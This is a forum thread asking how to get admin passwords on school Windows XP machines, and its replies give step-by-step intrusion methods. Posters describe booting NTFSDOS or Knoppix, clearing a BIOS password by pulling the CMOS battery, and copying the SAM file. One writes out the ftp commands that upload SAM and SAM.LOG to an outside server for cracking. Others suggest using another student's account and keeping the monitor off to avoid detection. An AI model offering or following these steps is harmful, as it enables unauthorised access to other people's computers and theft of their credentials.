Hacking Windows XP/ Pro Admin Passwords?

Status
Not open for further replies.
Alright, try this if any of that did not help...

(At home) Make a DOS boot disk, download NTFSDOS (which is a program that allows DOS to read an NTFS partition) and put it on the floppy.

(At school) Pop that baby in the system, boot from the floppy, run the NTFSDOS program, copy the SAM file to the floppy, remove the floppy, and return home.

(At home) Download @Stake L0pht crack program (http://www.atstake.com/products/lc/) and run it against the SAM file you stole.

If you want more help in this you can email me, or respond to this post.

I have done this at my school (When I was in school). It really depends how the network is setup, most schools use Active Directory (Domain Structure) so you can only get the local machines admin password (In most cases it is the same as the network administators password.) The network administrators password is stored on the domain controller.

how to open dos/ command promp

open up a note pad.
type in the word command or cmd
click on file.
and click on save as.

type any name and save as .bat

example: era.bat

these will make a shurt cut to cammand promp or ms-dos

im sorry english is not my first language

this is so funny. everyone's all been in that position. i understand. but y not just fplay gmaes and stuff at home? who cares about school? i kno most of you are just bored otta ur midns, but y cant u jsut be a ltitle patient and go home and screw around? of course, with me, i just brought a pda to schoo. oh man. it was sooooo funny. it had a universal remote and i turned the t.v. on in math class and the teacher (old) didnt notice. the whole class was all watching "the price is right" and then and only then did she notice when we all shouted "yah!" when some girl won. it was hjilarious. then, in the library, it was march madnesstime, 7. and I decided to go to the t.v. there and turn it on, and flip it to a sports channel. Oh man. The whole library was shouting, rooting for this team or that and I was gone before the librarians could sort out the chaos and restore order. Oh man. I was a hero weeks. Greatest thing ever. But anyways, just go home man. Easier that way. And u wont get busted that way either. Lol. I kno,. Its hard sometimes. Patience! :D

HAHA, I remember those days when my biggest goal in my computer classes was to be able to do whatever I wanted. Which I met that goal and got blammed for hacking the school districts network. Which was pretty gay. There is nothing worse than being threatened to go to jail by an FBI agent. (this was a year ago) What was very unjust is that they had no proof that I did anything wrong because they didn't have the network set up properly yet or something. But they decided to kick me out of the district for nothing, and now I have to go to school a semester after senior year(i am a junior) because I was on an extended suspension for 2 months while they investigated. Ever since then I haven't been able to take any computer classes, which sucks. I am stuck taking high school computer classes at a community college. It really sucked, because I didn't even do anything that they were accusing me of. Except the local admin profile. Which in the handbook says that the punishment is a week off campus suspension. What I did was I extracted the SAM file and cracked the admin password on a machine at home.

lol. see? i dont mean to offend u there, but there u go. u get into shit. that sort of thing.

We have the same kind of situation in my school, im in sixth form there, and i dont know if it will work on yours, it should do. if running 2000 or nt then open something like my documents, and press F1. type in the search box "telnet" and then choose "start telnet from a command prompt" help topic, and click display. then simply click the link in the help topic relevant to the command prompt. proceed to use the previous commands, but be warned, make sure you fully understand what you're doing, because if the admin has a brain then s/he will know who it was who changed passwords/other data. If at first you just use the "look but dont touch" philosphy, then you can simply use someone else's school account details if you still wish to change anything and allow the flash download. i leave it to you.

Yo. I have a laptop and the admin of the computer doesnt remember the password and im a restricted user on the XP system. Is there a way to remove his password with out having anything go wrong? I read what Jack said to the idiot with the school computers and i tried it all. Didnt make it very far. i had the same thing pop up as he did. The command prompt didnt recognize it as an internal or external source. Need some help!!! Let me know please!!!

This is what I do:

1. Download Knoppix (it's a live cd of linux with a gui)
2. Burn it to a disk.
3. Take it to school.
4. Go into bios, set boot sequence with cd first
5. change directory to C:\WINDOWS\system32\config
6. fire up ftp
7. throw the sam file onto the ftp server
8. download it when you're at home
9. crack (download a sam cracker from google)
10. come back to school with admin (root) whatever

Notes:

Make sure Knoppix works before you bring it to school. You'll have to burn it as an image for it to work right.

If there's a bios password, just take the computer apart, unplug the motherboard from the power supply and take out the lithium battery and it'll erase the cmos or whatever.

Make sure you have a working ftp server you can load to, you also need to know the address and possibly the port if it's not default.

I advise you to test this method and working it out to where you're comfterble with it.

Sorry this isn't an easy double click figure out the password type thing. It's near flawless, but it's not idiot proof.

I tested this on a 2.66 ghz 512 ddr. It takes a while to load up the disk. You can leave the monitor off to avoid detection.

After it's loaded. On the taskbar they'll be a monitor looking thing and it'll have a black screen. Click it, it will open up Konsole (terminal)

there should be a picture of the hard drive on the desktop. it'll be called hda1 or something.

the following commands you'll need to type comments are in after //. you don't type what's after the double slashes.

cd /mnt/hda1/WINDOWS/repair/
//this puts you in the directory where the sam file is.

ftp
open
//asks you who to connect to it'll say (to)
[the ip address of the computer with the ftp server you're uploading to]
put SAM
put SAM.LOG
close
exit
su
halt

once you're home, download a ftp client, smartftp is a good one (if you don't have *nix) connect to the server you uploaded them to. download them and crack away.

Status
Not open for further replies.
Back
Top Bottom